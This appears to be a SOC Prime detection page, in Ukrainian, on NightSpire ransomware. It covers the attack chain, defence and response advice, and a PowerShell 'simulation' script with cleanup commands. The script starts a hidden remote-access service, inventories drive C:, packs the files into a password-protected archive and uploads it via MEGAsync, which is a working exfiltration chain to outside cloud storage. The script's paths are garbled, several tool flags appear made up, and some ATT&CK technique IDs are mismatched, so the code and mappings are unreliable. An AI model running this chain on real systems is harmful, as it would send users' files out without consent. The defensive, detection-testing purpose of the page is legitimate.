SOC Prime Bias: Високий

25 May 2026 16:25 UTC

Атака з використанням програми-вимагача NightSpire: ланцюг, інструменти та тактика

Author Photo
SOC Prime Team linkedin icon Стежити
Атака з використанням програми-вимагача NightSpire: ланцюг, інструменти та тактика
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

NightSpire — це родина рансомвару на базі Go, вперше виявлена на початку 2025 року, яка використовує модель подвійного здирництва, крадучи дані перед шифруванням і загрожуючи опублікувати їх на Tor-базованому сайті витоків. Рансомвар додає .nspire розширення до зашифрованих файлів і розміщує примітки з викупом у кожному ураженому каталозі, включаючи папки, пов’язані з OneDrive. Її оператори покладаються на легітимні інструменти віддаленого адміністрування, щоб підтримувати доступ і використовувати загальнодоступні утиліти для виявлення, архівації та ексфільтрації. Між березнем і червнем 2025 року кампанія вплинула на щонайменше 64 організації у 33 країнах.

Розслідування

Розслідування показало, що зловмисники, як правило, отримували початковий доступ через відкритий RDP, а потім встановлювали Chrome Remote Desktop та AnyDesk як постійні служби. Вони використовували Everything для швидкого пошуку файлів, 7-Zip для створення архівів, захищених паролем, і MEGAsync для завантаження вкрадених даних на хмарне сховище MEGA. Шифрувальник на базі Go працював під conhost.exe, перераховував всі доступні диски і шифрував файли, залишаючи імена файлів OneDrive без змін. Етап здирництва спирався на сайт витоків, організований на Tor, який використовувався для тиску на жертв після ексфільтрації.

Захист

Організації повинні зменшити або усунути прямий доступ RDP, контролювати несподівану установку легітимних інструментів віддаленого адміністрування як служб, а також застосовувати дозволене списання додатків до двійкових файлів, таких як Chrome Remote Desktop та AnyDesk. Правила поведінкового виявлення повинні зосереджуватись на масовій інвентаризації файлів, створенні архівів і незвичайних завантаженнях на хмарні сховища. Регулярні резервні копії і випробувані процедури відновлення залишаються важливими, а мережеві контролі повинні блокувати відомі кінцеві точки завантаження MEGA. Захист також може бути перевірений через контрольовані симуляції рансомвару, такі як ті, що пропонує Picus.

Відповідь

Якщо виявлено активність NightSpire, негайно ізолюйте постраждалий кінцевий пункт, зупиніть процес шифрувальника і зберіть волатильну пам’ять для аналізу. Вимкніть будь-які шкідливі служби, видаліть залишені інструменти віддаленого доступу і заблокуйте відповідні мережеві комунікації. Відновлення повинно виконуватися з надійних резервних копій, а зацікавлені сторони повинні бути повідомлені. Інцидент також слід повідомити правоохоронним органам, поки захисники продовжують контролювати асоційований сайт витоків на Tor на наявність ознак опублікованих даних.

Потік атаки

Виконання симуляції

Передумова: Тестування телеметрії та базова перевірка має пройдено успішно.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP і прагнути до створення саме тієї телеметрії, яка очікується у логіці виявлення. Абстрактні або не пов’язані приклади призведуть до помилкового діагнозу.

  • Наратив атаки та команди:

    1. Налаштування стійкості (T1547 / T1219): Встановити Chrome Remote Desktop (за замовчуванням) та запустити його службу для отримання постійного віддаленого доступу.
    2. Виявлення (T1083): Використати Everything.exe для інвентаризації всіх файлів на диску C:, зберігаючи результати у тимчасовому списку.
    3. Архівація (T1037 / T1083): Запустити 7‑Zip для стиснення виявлених файлів у захищений паролем архів.
    4. Ексфільтрація (T1219.003): Запустити MEGAsync для завантаження архіву на обліковий запис MEGA.

    Ця послідовність забезпечує, що selection_remote_access (Chrome Remote Desktop) активний, доки хоча б одне з selection_discovery, selection_archive, або selection_exfiltration відбувається, задовольняючи умову правила.

  • Скрипт регресійного тесту:

    # -------------------------------------------------------------------------
    # Симуляція бічної стійкості та ексфільтрації NightSpire
    # -------------------------------------------------------------------------
    # Передумови:
    #   - Chrome Remote Desktop встановлений за замовчуванням
    #   - Everything.exe встановлений за замовчуванням
    #   - 7z.exe встановлений за замовчуванням
    #   - MEGAsync встановлений у стандартному профілі користувача
    # -------------------------------------------------------------------------
    
    # 1. Переконайтеся, що служба Chrome Remote Desktop працює (симулює стійкість)
    $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe"
    if (Test-Path $crdPath) {
        Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden
        Write-Host "Служба Chrome Remote Desktop запущена."
    } else {
        Write-Error "Chrome Remote Desktop не знайдено за шляхом $crdPath"
        exit 1
    }
    
    # 2. Виявлення файлів за допомогою Everything
    $everythingPath = "$Env:ProgramFilesEverythingEverything.exe"
    $discoveryOutput = "$env:TEMPfilelist.txt"
    if (Test-Path $everythingPath) {
        & $everythingPath -search "C:" -output $discoveryOutput
        Write-Host "Виявлення завершено, результати збережено в $discoveryOutput"
    } else {
        Write-Error "Everything.exe не знайдено за шляхом $everythingPath"
        exit 1
    }
    
    # 3. Архівування виявлених файлів з 7‑Zip
    $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe"
    $archivePath   = "$env:TEMPexfil_archive.zip"
    if (Test-Path $sevenZipPath) {
        & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!"
        Write-Host "Архів створено в $archivePath"
    } else {
        Write-Error "7z.exe не знайдено за шляхом $sevenZipPath"
        exit 1
    }
    
    # 4. Завантаження архіву через MEGAsync (ексфільтрація)
    $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe"
    if (Test-Path $megaPath) {
        & $megaPath --upload $archivePath
        Write-Host "Завантаження розпочато через MEGAsync."
    } else {
        Write-Error "MEGAsync.exe не знайдено за шляхом $megaPath"
        exit 1
    }
    
    # Кінець симуляції
  • Команди для очищення:

    # Зупинити службу Chrome Remote Desktop
    Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue
    
    # Видалити тимчасові файли
    Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue
    
    # За бажанням зупинити MEGAsync, якщо працює
    Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue